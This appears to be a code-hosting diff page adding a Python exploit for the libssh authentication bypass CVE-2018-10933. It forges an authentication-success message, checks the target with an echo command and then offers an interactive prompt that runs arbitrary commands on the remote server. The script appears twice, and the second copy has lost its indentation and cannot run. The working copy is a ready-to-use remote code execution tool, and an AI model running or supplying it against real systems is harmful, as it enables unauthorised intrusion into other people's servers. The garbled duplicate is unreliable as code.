ticarpi · November 8, 2018 08:02
diff --git a/libssh_exploit_CVE-2018-10933.py b/libssh_exploit_CVE-2018-10933.py
 #!/usr/bin/env python3

 ############################################################
 # A LibSSH RCE tool by @ticarpi                            #
 # Cloned/carved/tweaked from multiple sources              #
 # This checks an SSH port to see if it's vulnerable to     #
 # CVE-2018-10933                                           #
 # If it is it will prompt you for commands to run remotely #
 # Usage:                                                   #
 # $ python libssh_exploit_CVE-2018-10933.py <ip> <port>    #
 # $ python libssh_exploit_CVE-2018-10933.py 10.10.1.100 22 #
 ############################################################

 import sys
 import paramiko
 import socket
 import logging

 # pip3 install paramiko==2.0.8

 #logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
 logging.basicConfig(stream=sys.stdout)
 bufsize = 2048



 def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
        client = transport.open_session(timeout=10)
        client.exec_command(command)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)
        output = stdout.read()
        error = stderr.read()
        stdout.close()
        stderr.close()
        return (output+error).decode()

    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


 if __name__ == '__main__':
    vulntest = execute(sys.argv[1], sys.argv[2], "echo VULNERABLE")
    # print(vulntest)
    if "VULN" in vulntest:
        print("Vulnerable")
    else:
        print("Not Vulnerable")
        exit()
    while True:
        command = input("Enter command (Ctrl+C to exit):")
        print(execute(sys.argv[1], sys.argv[2], command))
	#!/usr/bin/env python3

	############################################################
	# A LibSSH RCE tool by @ticarpi #
	# Cloned/carved/tweaked from multiple sources #
	# This checks an SSH port to see if it's vulnerable to #
	# CVE-2018-10933 #
	# If it is it will prompt you for commands to run remotely #
	# Usage: #
	# $ python libssh_exploit_CVE-2018-10933.py <ip> <port> #
	# $ python libssh_exploit_CVE-2018-10933.py 10.10.1.100 22 #
	############################################################

	import sys
	import paramiko
	import socket
	import logging

	# pip3 install paramiko==2.0.8

	#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
	logging.basicConfig(stream=sys.stdout)
	bufsize = 2048



	def execute(hostname, port, command):
	sock = socket.socket()
	try:
	sock.connect((hostname, int(port)))

	message = paramiko.message.Message()
	transport = paramiko.transport.Transport(sock)
	transport.start_client()
	message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
	transport._send_message(message)
	client = transport.open_session(timeout=10)
	client.exec_command(command)
	stdout = client.makefile("rb", bufsize)
	stderr = client.makefile_stderr("rb", bufsize)
	output = stdout.read()
	error = stderr.read()
	stdout.close()
	stderr.close()
	return (output+error).decode()

	except paramiko.SSHException as e:
	logging.exception(e)
	logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
	except socket.error:
	logging.debug("Unable to connect.")

	return None


	if __name__ == '__main__':
	vulntest = execute(sys.argv[1], sys.argv[2], "echo VULNERABLE")
	# print(vulntest)
	if "VULN" in vulntest:
	print("Vulnerable")
	else:
	print("Not Vulnerable")
	exit()
	while True:
	command = input("Enter command (Ctrl+C to exit):")
	print(execute(sys.argv[1], sys.argv[2], command))